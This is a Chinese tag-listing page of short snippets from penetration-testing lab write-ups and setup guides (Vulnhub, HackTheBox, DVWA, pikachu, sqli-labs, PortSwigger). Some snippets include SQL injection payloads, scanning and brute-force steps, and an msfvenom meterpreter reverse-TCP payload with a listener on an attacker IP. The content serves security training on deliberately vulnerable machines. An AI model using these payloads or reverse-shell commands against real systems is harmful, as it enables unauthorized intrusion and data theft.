首页 > TAG信息列表 > 靶场

Thales: 1-vulnhub靶场

环境信息 靶机:192.168.124.150 攻击机:192.168.124.129 打靶过程 nmap 扫描端口及服务 发现开放了 22,8080 端口 访问 8080 是 apache tomcat 欢迎页面 目录扫描 目录扫描未发现扫描有用信息 tomcat 登录爆破 因为 tomcat 有管理登录页面,于是尝试爆破 成功爆破出 tomcat 账号密

sqli-labs靶场渗透

环境搭建 将下载好的sqlilabs解压到phpstudy的www目录 转到sqlilabs项目的sql-connections目录,用记事本打开db-creds.inc文件,将$dbuser和$dbpass的值修改成mysql数据库的账号与密码, 这里均修改成root phpstudy的mysql数据库账号与密码默认为root 浏览器打开搭建好的sqlilab

Noob: 1-vulnhub靶场

环境信息 靶机:192.168.124.148 攻击机:192.168.124.129 打靶过程 nmap扫描端口及服务 发现开放了 21,80,55077 端口,且存在 ftp 匿名访问 访问 80 端口,是一个登录页面 ftp 匿名访问 访问 ftp 发现两个文件 下载并查看 cred.txt base64 解码得到一个疑似账号密码 利用得到的账号密

靶场Prime目标主机攻击

  一、ping扫描C段 nmap -sP 192.168.178.1/24    ————》获取IP   二、端口扫描 nmap  -p 1-65535 -A 192.168.178.133   ——》获取80  22端口 补充:端口扫描其他方法 netdiscover -p arp-scan ?   三、目录扫描 dirb http://192.168.178.133   -->   获取inde

【靶场】HackTheBox-关卡Dancing

介绍 点击此界面右下角第一个图标,即可查看本篇文章的目录结构。该目录会显示在文章右侧。 一、关卡Dancing 先创建实例: TASK1 问题是:3 个字母的首字母缩写词 SMB 代表什么? SMB即Server Message Block(服务器消息块),是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用

【靶场】HackTheBox-关卡Fawn

介绍 点击此界面右下角第一个图标,即可查看本篇文章的目录结构。该目录会显示在文章右侧。 一、关卡Fawn 先创建实例: TASK1 问题是:3 个字母的首字母缩写词 FTP 代表什么? FTP是文件传输协议的简写。 FTP文件传输协议(File Transfer Protocol)是用于在网络上进行文件传输的一套标准

BurpSuite安全实验室,靶场

推荐一个安全实验室,BurpSuite的。是在B站看deelmind视频时看到了。 里面靶场很多,还有答案,用来练手很不错。 https://portswigger.net/web-security

网络安全入门(靶场搭建)

靶场搭建DVWA (综合类型靶场) 可以用phpstudy wamp搭建 本文以phpstudy为例   下载安装 phpstudy 把DVWA原码解压后放置phpstudy安装目录的www文件夹中 进入DVWA/config目录,将config.inc.php.dist的.dist 删除 打开config.inc.php文件,修改db_user和db_password root root 打开浏览

安全术语

  1、黑客(hacker)---对计算机技术非常擅长的人,窃取数据,破坏计算机系统 2、脚本小子---刚刚入门安全行业,学习了一些技术,指挥使用现成的工具或者从网上复制代码。 3、白帽子---白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题(360补天,漏洞盒子,CNVD,CNNVD) 4、红帽黑客--

Pikachu靶场WriteUp

声明 ​ 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。如欲转载或传播此文章,必须保证此文章的完整性,未经众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 靶场配置 ​ 靶场地址

pikachu靶场实战

暴力破解 基于表单的暴力破解 随便填用户名和密码之后用burp抓包,用常用字典直接爆破即可。 字典推荐:fuzzDicts 爆破结果: 将响应包按长度排序,由此可知:用户名为admin(不区分大小写),密码为123456 验证码绕过(on server) 先填入正确的用户名、密码和验证码进行重放攻击测试 经测

DVWA靶场的建立

先安装phpstudy https://www.xp.cn/download.html phpstudy官方网址 安装完成后 开启服务,开启之前可能会提示需要安装VC9和VC11(mysql服务密码默认是root) 允许目录列表 布置DVWA靶场 https://github.com/digininja/DVWA 下载DVWA靶场,完成后将压缩包解压后的文件夹移动到

【靶场】

less-18 user-agent注入 ' and updatexml(1,concat('~',(select database()),'~'),1),1,1,) -- lq      less-19 'or updatexml(1,concat(0x7e,(database())),1) and '1'='1 referer参数注入     less-20 cookie注入   ' and up

【靶场训练】sql-libs

less-15 布尔盲注 ' or (length(database())=8)-- lq 判断数据库长度 'or (substr(database(),1,1)='s' -- lq) 猜库名 'or (substr(select table_name from information_schema.tables where table_schema='security' limit 0,1,1,1)='s' --

pikachu靶场搭建教程

pikachu靶场搭建教程 一、 实验所需环境 1. Windows 2. phpstudy_pro 3. pikachu 二、 下载链接 pikachu靶机下载地址: https://github.com/zhuifengshaonianhanlu/pikachu phpstudy集成开发环境: https://www.xp.cn/ 三、 安装教程 (1)安装phpstudy_pro,将下载的pikachu靶机放入phps

Vulnhub 靶场 DRIFTINGBLUES: 4

前期准备: 靶机地址:https://www.vulnhub.com/entry/driftingblues-4,661/ kali攻击机ip:192.168.11.128 靶机ip:192.168.11.161 一、信息收集 1.使用nmap对目标靶机进行扫描 开放了21、22、80端口。 2. 21端口 匿名登陆失败。 3. 80端口 查看源码: 发现一串 base64: 还是一段一段

掌控安全学院SQL注入靶场-布尔盲注(三)

测试了username参数,没有发现注入 123456' or '1'='1 123456' or '1'='2    第二种注入方法  

关于web安全学习

入门学习 可以通过pikachu靶场进行web安全各个方面的学习,靶场难度等级不高,同时可以在B站找到完整的教程,不用担心资料东拼西凑,可以说是新手入门的不二选择了。 这里给大家提供一份源码,不过具体如何搭建就不介绍了,有意愿的可以自行百度。 https://www.123pan.com/s/oSWDVv-v9XGd 前

Portswigger靶场SSRF实验

Portswigger靶场SSRF实验 针对本地服务器的基础SSRF 靶场 basic-ssrf-against-localhost 说明 This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localho

网络空间已经成为国家继海陆空天之后的第五大主权领域空间

随着网络空间作为一个单独的军事领域被当作继陆、海、空、天之后的第五域——美国国防部在2011年正式将网络空间作为第五个军事维度,而北约直到 2016年晚些时候才承认网络空间是一个作战领域——世界各国都在争先恐后地制定网络安全战略,包括开发、利用、获得网络能力。网络能力被认

【MYSQL】UDF命令执行靶场

什么是UDF UDF 全称为:User Defined Function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++编写。 UDF在渗透中的作用 在一般渗透过程中,拿下一台

红日靶场(内网渗透)——2

1.后渗透。 之前我们已经将小马上传,在这里用webshell进行进一步渗透。 1)基于msf 利用msf生成exe,并上传。 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe       use exploit/multi/handler set payload windows/x64/me

portswigger靶场XSS攻击实验

portswigger靶场XSS攻击实验 实验一、没有任何编码的反射型XSS 靶场 html-context-nothing-encoded 说明 This lab contains a simple reflected cross-site scripting vulnerability in the search functionality. To solve the lab, perform a cross-site scripting attack tha

红日靶场(内网渗透)——1

1.靶机信息。 win7 x64:ip:192.168.248.129 2008: ip:192.168.138 win2k3:192.168.52.141 攻击机信息: kali:集成各种攻击工具  ip:192.168.248.128 win10:主要进行数据整理。 2.信息搜集。 1)使用kali扫描靶机 netdiscover -r 靶机IP网段      发现win7外网网址为:192.168.248.129

fortify+DVWA靶场和动态IAST审计JAVA靶场

工具下载地址 Fortify介绍 Fortify 其实是Micro 公司开发的一款AST(应用程序安全测试)产品,它包括: Fortify Static Code Analyzer 可以成为静态代码分析器,Fortify 是 响应式动态安全测试软件,Software Security Center 是软件安全分析中心 和 Application 就是及时响应程序自我保护